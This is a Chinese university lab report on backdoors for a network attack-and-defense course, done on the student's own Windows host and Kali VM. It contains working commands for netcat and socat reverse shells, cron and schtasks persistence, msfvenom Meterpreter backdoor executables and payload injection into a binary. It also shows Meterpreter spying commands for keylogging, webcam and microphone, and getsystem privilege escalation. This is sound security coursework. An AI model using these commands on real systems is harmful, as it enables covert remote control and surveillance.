首页 > 其他分享 >20222311 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222311 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-19 11:43:40浏览次数:5  
标签:exe 主机 虚拟机 2311 2024 2025 20222311 输入

一、实验内容

1.实验目标
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    (1)下载来源不可靠的文件;
    (2)访问受感染的网站或社交媒体链接;
    (3)插入不明来源的U盘;
    (4)在钓鱼网站上点击不安全的链接。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    (1)在Windows系统中:利用windows启动项启动后门、利用windows服务启动后门、利用定时任务启动后门等;
    (2)在Linux系统中:利用cron或at等定时任务工具启动后门、利用自启动脚本启动后门、利用利用SSH隧道启动后门、利用反弹Shell启动后门等。
  • Meterpreter有哪些给你映像深刻的功能?
    能获得目标主机的shell、摄像头和麦克风权限、进行截屏并获得键盘记录等,能够窃取大量的隐私数据,网络防护工作真是任重道远。
  • 如何发现自己有系统有没有被安装后门?
    (1)使用杀毒软件进行全盘杀毒扫描;
    (2)使用cmd查看是否有可疑IP在进行外网链接;
    (3)检查系统日志的系统和安全部分,检查是否有可疑程序。

二、实验过程
1.使用netcat获取主机操作Shell,cron启动某项任务
(1)查看主机的ip
首先关闭主机和虚拟机的防火墙,在windows主机上下载ncat程序,并打开cmd,输入ipconfig指令查看主机的IP地址:

(2)使用netcat进行连接并获取shell

  • 虚拟机登入root用户(后续操作需要使用root权限),主机cmd进入ncat所在目录。
  • Win主机输入指令:ncat.exe -l -p 2311(l表示listen,“监听”;p表示port,指定端口,端口号可自行指定)
  • Linux虚机输入指令:nc 172.16.178.98 2311 -e /bin/sh(nc即netcat,后面的参数是要连接的ip和port,-e是指定连接后运行的程序,本例中就是shell。)

    win主机输入ls,若能够正常显示虚拟机下文件名,证明主机已成功获取虚拟机shell。
    (3)通过设置cron使得kali启动定时任务。
  • cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程。注意:windows不能直接使用crontab -e远程编辑,会报错;
  • 我们这里进入虚拟机的虚拟机的root账户,输入crontab -e (执行文字编辑器来设定时程表),选择的是2:/usr/bin/vim.basic;
  • 输入后进入文字编辑器,输入指令30 * * * * /bin/netcat 192.168.31.233 8888 -e /bin/sh (输入自己主机的IP地址,在每小时的第30分钟启动任务)
  • 编辑好后退出文字编辑器,输入crontab -l查看时程表:
  • 同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。
  • 现在回到Windows主机的cmd中进行操作,还是一样与Linux建立连接之后,切换到root模式,输入:
    echo "* * * * * echo "20222311" > /home/wshkali/2311_1.txt" > /var/spool/cron/crontabs/root(每分钟定时执行一次,用“20222311”覆盖文件2311_1.txt)
  • crontab -l (检查时程表)

    进入Linux虚拟机进入对应路径检查2311_1.txt文件,发现修改成功。

    2. 使用socat获取主机操作Shell,任务计划启动
  • Socat与netcat类似,但比起netcat,socat功能更多,比如如建立ssl连接。
  • windows主机:下载socat,cmd进入socat文件夹,输入命令:
    socat.exe tcp-listen:2311 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2311,并把cmd.exe的stderr重定向到stdout)
  • Linux虚拟机:进入root用户,输入命令:
    socat - tcp:192.168.1.110:2311

  • 回到主机,我们需要事先准备一个程序以供运行,在此省略程序编写环节
  • 在Linux上启用Windows的程序,通过命令行创建任务计划,在shell里输入命令:schtasks /create /sc minute /mo 1 /tn "20222311" /tr C:\Users\Petrichor\Desktop\20222311.exe每一分钟执行一次我写的这个程序:)
  • 回到windows主机,打开计算机管理,看到正在运行的任务名“20222311”,说明实验成功。

3.在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell

  • 保证windows的实时保护处于关闭状态,同时关闭防火墙进行实验。


(1)生成后门文件

  • 首先在kali中输入ifconfig,获得虚拟机的IP地址:
  • 虚拟机的IP地址是192.168.1.111
  • 继续中输入以下命令:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=2311 -f exe > 2311backdoor.exe(使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个可执行文件中。)
  • LHOST=192.168.1.111是shell 连接的主机 IP 地址,在本实验中是虚拟机的IP地址;
  • LPORT=2311是攻击者的系统上监听的端口号;
  • -f exe指定了生成的 payload 的格式,这里是exe;
  • 2311backdoor.exe即生成的恶意可执行文件(名称自拟)

(2)将后门文件传输至目标主机

  • 主机进入ncat所在目录下,输入指令:
    ncat.exe -lv 2311 > "C:\Users\Petrichor\Desktop\2311backdoor.exe"(监听2311窗口等待接收可执行文件2311backdoor.exe,并将2311backdoor.exe文件存放在桌面上)
  • 虚拟机上输入指令:
    nc 192.168.1.110 2311 < 2311backdoor.exe(将生成的后门文件2311backdoor.exe传给主机)
  • Win主机接收到后门文件2221backdoor.exe,成功在桌面找到文件

(3)配置监听模块

  • 回到虚拟机,在Kali终端输入命令msfconsole,然后对监听模块进行配置:
  • use exploit/multi/handler(使用监听模块,设置payload)
  • set payload windows/meterpreter/reverse_tcp (使用和生成后门程序时相同的payload)
  • set LHOST 192.168.1.111 (攻击机的IP地址,和生成后门程序时指定的IP相同)
  • set LPORT 2311(监听的端口)
  • 接着输入exploit,使监听模块开始运行,并在Windows终端运行后门2311backdoor.exe文件

  • 返回检查虚拟机,输入ls查看windows主机目录,确认已经连接。

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)获取目标主机音频、截屏、摄像头、键盘记录

  • 在exploit模块中继续输入以下命令:
    record_mic   (音频)
    screenshot   (截屏)
    webcam_snap (拍照)
    keyscan_start (开始读取键盘记录)
    keyscan_dump (读取键盘记录结束)


  • 音频截屏和拍照被保存在root文档中,键盘记录的字符串将直接显示在命令栏上

(2)提权

  • 确保windows的cmd指令是使用管理员身份运行的,继续在exploit模块中继续输入:
    getuid (查看当前用户)
    getsystem (提权指令)

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

  • 在kali命令行下输入:
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.111
    LPORT=2311 -x /home/wshkali/Desktop/pwn20222311-1 -f elf > 20222311_pwn
    (使用了msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为 20222311_pwn的文件中。)
  • 对生成的20222311_pwn文件赋予权限:
  • 输入指令msfconsole,重现监听过程:

  • 打开另一个shell,运行生成的20222311_pwn文件(需要使用root权限)
  • 回到第一个shell,输入ls确认连接,成功实现远程控制shell

三、实验中遇到的问题及解决办法

  • 问题1:在使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell时,我用root权限输入输入:
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.111
    LPORT=2311 -x /home/wshkali/Desktop/pwn20222311-1 -f elf > 20222311_pwn
    这个代码,其生成的20222311_pwn文件在root文件夹中,导致我后续打开这个文件的操作报错。
    解决方法:我重新在kali命令行下运行了这个代码,实验得以成功
  • 问题2:一开始我在window上使用nc -l -p 2311这个代码报错

    解决方法:我改进了代码,使用ncat.exe -l -p 2311得以成功运行
  • 问题3:socat实验中在Windows机cmd端schtasks /create /sc minute /mo 1 /tn "20222311" /tr C:\Users\Petrichor\Desktop\20222311.exe运行错误
    解决方法:格式错误,每个指令(如/create,/mo 1等)前都需要附带空格键。修改后得以成功

四、实验体会

  • 在这次网络安全实验中,我深刻体会到了网络安全的重要性和复杂性。通过实践,我学习了Linux下的cron作业调度器,这让我了解到了如何自动化执行日常任务,比如定期备份数据和更新系统。这种自动化不仅提高了效率,也增强了系统的安全性。
  • 我还学习了netcat和socat这两个网络工具的使用,它们在网络通信和调试中扮演着重要角色。通过这些工具,我能够更好地理解网络数据的传输和处理过程,这对于维护网络的稳定性和安全性至关重要。
  • 此外,通过模拟恶意软件的分析和防御,我提高了对潜在网络威胁的认识。我学会了如何使用各种工具来检测和防御这些威胁,这对于保护我们的数字资产至关重要。
  • 最后,通过学习缓冲区溢出和Shellcode的注入,我更加明白了这些高级攻击手段的工作原理。虽然这些技术在网络安全领域有着重要的应用,但它们也应该被用于防御,而不是攻击。
  • 总的来说,这次实验不仅提高了我的技术技能,也加深了我对网络安全重要性的理解。我认识到,作为一名网络空间安全专业的学生,我们有责任使用这些技能来保护网络环境,而不是滥用它们。网络安全是一个不断发展的领域,我们需要不断学习和适应新的威胁和挑战。

标签:exe,主机,虚拟机,2311,2024,2025,20222311,输入
From: https://www.cnblogs.com/20222311wsh/p/18475703

相关文章

  • 2024-2025-1 20241407《计算机基础与程序设计》第四周学习总结
    这个作业属于哪个课程2024-2025-1-计算机基础与程序设计这个作业要求在哪里2024-2025-1计算机基础与程序设计第四周作业这个作业的目标学习门电路,组合电路,逻辑电路,冯诺依曼结构,CPU,内存,IO管理,嵌入式系统,并行结构,物理安全作业正文https://www.cnblogs.com/wangyih......
  • 20222305 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    网络攻防实验报告姓名:田青学号:20222305实验日期:2024/10/16—2024/10/23实验名称:后门原理与实践指导教师:王志强1.实验内容本周学习内容总结::后门概念:不经过正常认证流程而访问系统的通道。后门类型:编译器后门、操作系统后门、应用程序后门、潜伏于操作系统中或伪装为特......
  • 20241017 模拟赛
    看题戳这里总结时间分配:30min自习,30mint1,然后在t2,t3,t4中间反复横跳,最后一小时狂冲t3没出来,悲伤。后来听巨佬说t3很离谱,也不知道是不是真的。最终分数:0+50+0+0为什么第一题挂了?为什么第一题挂了?为什么第一题挂了?为什么第一题挂了?哦,原来是玩原神freopen注释了导致的。解析......
  • 顶会论文下载合集(ECCV 2024全)
    2024CV2024综述(持续更新中)链接:https://pan.baidu.com/s/16yglfB7YtkDDWFQPC3u9xQ提取码:52CVECCV2024论文全链接:https://pan.baidu.com/s/1YUVUqmIP3Y_DIxg4w1OYwg提取码:52CVCVPR2024论文全链接:https://pan.baidu.com/s/15-RZjmXoTxZtyS7NMxV4CQ提取......
  • 【2024最新版】Win10下 Java环境变量配置----适合入门小白
    首先,你应该已经安装了Java的JDK了(如果没有安装JDK,请跳转到此网址:http://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html)笔者安装的是jdk-8u91-windows-x64接下来主要讲怎么配置Java的环境变量,也是为了以后哪天自己忘记了做个备份(注:win10的......
  • 2024.10.18 2342版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......
  • <<程序员修炼之道-从小工到专家>> -2024/10/18
    读了程序员修炼之道-从小工到专家第二版虽然还没读完,但我已经感受到这本书的魅力所在,在书的评价中,有一些有名的程序员都将这本书称为自己的成功之书,并在一段时间都要看一次,书中序言一直强调,这本书不会告诉你编程应该是怎么样的,它并没有使用那种哲学或审判的方式告诉你,......
  • 20222426 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    202224262024-2025-1《网络与系统攻防技术》实验二实验报告1.实验内容(1)例举你能想到的一个后门进入到你系统中的可能方式?后门进入系统中的一种可能方式是通过下载并安装带有后门程序的恶意软件。这些恶意软件可能伪装成合法的软件或工具,诱骗用户下载并安装。一旦安装,后门程......
  • 2024-10-18
    背景属性颜色设置元素的背景图像设置如何平铺背景size属性设置背景大小设置默认背景的显示位置......
  • 2024.10.18 2309版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......